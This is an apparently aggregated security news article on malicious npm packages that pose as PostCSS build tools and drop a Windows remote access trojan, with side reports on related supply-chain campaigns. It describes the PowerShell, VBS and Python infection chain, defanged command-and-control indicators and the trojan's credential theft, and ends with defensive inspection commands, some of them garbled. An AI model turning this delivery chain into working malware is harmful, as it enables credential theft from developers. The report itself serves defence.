Listen to this Post
Introduction: A Growing Threat Hidden in Trusted Development Tools
The modern software supply chain has become one of the most targeted attack surfaces in cybersecurity. What once was a trusted ecosystem of open-source libraries is now increasingly exploited as a silent delivery channel for malware. In the latest wave of attacks, cybersecurity researchers uncovered malicious npm packages disguised as harmless build tools that secretly deploy a Windows-based Remote Access Trojan (RAT). These packages blend into normal developer workflows, leveraging familiar naming conventions and widely used dependencies to avoid suspicion while executing a deeply layered infection chain.
Discovery of Malicious npm Packages Masquerading as Legitimate Tools
Security analysts identified three npm packages published under the user “abdrizak” that collectively form a coordinated malware delivery system. The packages include aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser. Despite their low download counts, their design is highly deceptive, mimicking legitimate PostCSS-related utilities used in large-scale JavaScript development environments.
Each package is structured to appear functional. One pretends to handle AES decoding layers, another claims to optimize CSS selector performance, while a third mimics a widely trusted dependency ecosystem component. Beneath this surface-level legitimacy, however, lies a chained execution mechanism that ultimately leads to Windows system compromise.
Abuse of Trusted Dependency Chains in the npm Ecosystem
The attackers carefully designed dependency relationships to increase trust. One package depends on another malicious module, which itself references legitimate libraries such as postcss-selector-parser. This blending of malicious and legitimate dependencies creates a camouflage effect, making detection significantly harder for automated scanners and human reviewers alike.
By referencing libraries with millions of weekly downloads, the attackers exploit implicit trust in well-known open-source ecosystems. Developers who install these packages unknowingly initiate a chain reaction that sets the malware deployment in motion.
Multi-Stage Infection Chain Leading to Windows RAT Deployment
Once installed, the packages execute a JavaScript dropper that writes a PowerShell script named settings.ps1 onto the system. This script then downloads a second-stage payload from an external server hosted at nvidiadriver[.]net using curl.exe.
The downloaded payload is delivered as a ZIP archive containing a Visual Basic Script (update.vbs), a bundled Python runtime, and multiple compiled Python extensions. When executed, the VBS file prepares the environment and launches loader.py, which activates the malware’s core functionality.
This multi-layered structure ensures resilience, allowing the malware to bypass simple detection mechanisms while establishing persistence across Windows systems.
Capabilities of the Remote Access Trojan and Data Exfiltration
The final payload is a fully functional Remote Access Trojan designed for stealth and control. It collects system information, steals stored credentials from Google Chrome, extracts browser extension data, executes remote shell commands, and enables file upload and download operations.
Communication with the command-and-control server located at 95.216.92[.]207:8080 allows attackers to maintain persistent access to compromised machines. The RAT’s modular structure makes it flexible, allowing attackers to expand functionality without modifying the core infection chain.
Python Extension Modules Powering the Malware Infrastructure
The malware relies on compiled Python modules built using Nuitka, each serving a specialized role within the system:
config.pyd manages constants, registry keys, and command IDs
api.pyd handles HTTP communication with the C2 server
audiodriver.pyd controls the main execution loop
command.pyd executes system profiling and VM detection
auto.pyd steals Chrome credentials and bypasses encryption protections
util.pyd manages compression and data packaging
This modular architecture reflects a professional-grade malware design, resembling commercial spyware frameworks rather than amateur scripts.
Security Experts Warn of Lookalike Packages and Supply Chain Risk
Researchers from JFrog emphasized that even seemingly minor parser-style packages can conceal complex multi-stage payloads. The attackers rely on naming similarity and dependency confusion to bypass developer scrutiny.
The key lesson is clear: build systems are no longer passive tools. They are active attack vectors. Any dependency, especially those mimicking popular libraries, must be treated as potentially hostile until verified.
Broader npm and TypeScript Ecosystem Under Parallel Attack
This campaign is not isolated. Multiple concurrent operations have been detected across the npm ecosystem.
One malicious package named apintergrationpost installs a Linux-based RAT called MYRA. It compiles a native rootkit during installation, establishes persistence through systemd services, and enables live screen streaming and remote shell access.
Another campaign involves @withgoogle/stitch-sdk, which impersonates Google’s Stitch AI tool. It steals developer credentials from sources including SSH keys, Git configs, npm settings, Docker configurations, and more, exfiltrating them to a remote domain controlled by attackers.
A third cluster of packages including procwire, routecraft, endpointmap, bytecraft, and staticlayer works as a coordinated dropper network, executing malware during npm install and distributing payloads based on server-side triggers.
Supply Chain Attack Extending into AI and Blockchain Infrastructure
Researchers also identified attacks targeting the gonex-AI/Understand-Anything project. The malicious payload uses multi-stage execution, including blockchain-based command retrieval from Tron transactions. This unconventional method allows attackers to hide instructions in public decentralized systems, making takedown nearly impossible.
The malware beacons multiple command servers, decrypts payloads using XOR logic, and dynamically evaluates downloaded bot clients, demonstrating a shift toward adaptive, infrastructure-resistant malware design.
North Korean Linked Campaigns and the Rise of PolinRider Activity
Security analysts also observed overlap with a North Korean-linked supply chain operation known as PolinRider. This campaign injects obfuscated JavaScript into legitimate GitHub repositories, affecting nearly 2,000 projects.
The malware chain deploys BeaverTail, a known data stealer, which then installs the InvisibleFerret backdoor. The operation uses deceptive pull requests, whitespace-obfuscated diffs, and blockchain-based C2 fallback channels, making detection extremely challenging.
Urgent Response and Developer Security Recommendations
Security teams strongly advise immediate removal of any affected packages. Developers are urged to inspect node_modules directories, audit dependency trees, and rotate all credentials used on impacted machines.
Ignoring such infections may result in full system compromise, credential theft, and long-term persistence within development environments.
What Undercode Say:
The npm ecosystem is no longer just a dependency manager, it is a battlefield for supply chain infiltration
Malicious actors are increasingly targeting developer trust rather than system vulnerabilities
Multi-stage payload delivery is becoming standard in open-source malware campaigns
Dependency confusion attacks are evolving into identity mimicry attacks
Attackers are now leveraging legitimate high-download libraries as camouflage anchors
PowerShell remains a preferred execution layer for Windows-based infection chains
Visual Basic scripts are being reused as silent orchestration layers for Python malware
Bundled runtimes reduce dependency visibility and bypass traditional detection tools
Credential theft modules are increasingly modular and reusable across campaigns
Chrome credential extraction remains a primary target for cross-platform attackers
Nuitka-compiled binaries make reverse engineering significantly harder
Command-and-control infrastructure is shifting toward decentralized and resilient hosting
Blockchain-based payload delivery introduces near-irreversible attack channels
Multi-ecosystem targeting (npm, GitHub, AI tools) shows coordinated global operations
Supply chain compromise is now preferred over direct endpoint exploitation
Fake development tools are becoming indistinguishable from legitimate utilities
Malware authors are mimicking PostCSS ecosystem naming conventions for trust exploitation
VM detection logic suggests attackers are avoiding sandbox analysis environments
Fileless execution techniques are being combined with traditional persistence methods
Credential aggregation from multiple sources increases attacker monetization potential
AI tooling impersonation expands attack surface beyond traditional dev tools
Rootkit compilation during installation signals advanced attacker sophistication
Systemd persistence shows Linux targeting parallel to Windows infection chains
GitHub repository poisoning remains a scalable mass infection method
Whitespace obfuscation is used to bypass diff-based code review
Multi-stage C2 architecture improves resilience against takedown
Developer pipelines are now primary infiltration vectors
Security scanning tools struggle with mixed legitimate-malicious dependency graphs
Attackers are increasingly using hybrid scripting languages for cross-platform execution
The convergence of npm, AI tools, and blockchain indicates ecosystem-level threats
Trust in package registries is becoming the weakest link in software security
❌ Malicious npm packages are publicly confirmed by researchers, but download impact appears limited and not globally widespread yet
✅ Multi-stage Windows RAT delivery chain (PowerShell, VBS, Python) is technically consistent with known supply chain malware behavior
❌ Attribution to specific nation-state groups is suggested in parallel campaigns but not directly proven for this npm package cluster
Prediction
(+1) Supply chain attacks will increase across npm and similar registries as attackers refine dependency-based infection methods and exploit developer trust models
(-1) Security tooling will struggle to fully eliminate lookalike package threats due to rapid publishing cycles and low-cost repository creation
(+1) Future malware will increasingly adopt multi-ecosystem delivery, combining blockchain, AI tooling impersonation, and CI/CD pipeline abuse
Deep Analysis
Linux command:
grep -R "postinstall" node_modules/ find . -name ".ps1" -o -name ".vbs" ps aux | grep node netstat -tulnp
Windows command:
Get-ChildItem -Recurse -Include .ps1,.vbs
Get-Process | Where-Object {$_.Path -like "node"}
netstat -ano
wmic process list full
Mac command:
find . -name ".js" -o -name ".sh" lsof -i ps aux | grep node launchctl list
These commands reflect how defenders inspect suspicious npm installations, detect persistence scripts, and trace hidden execution chains across development environments.
▶️ Related Video (74% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: thehackernews.com
Extra Source Hub (Possible Sources for article):
https://www.stackexchange.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
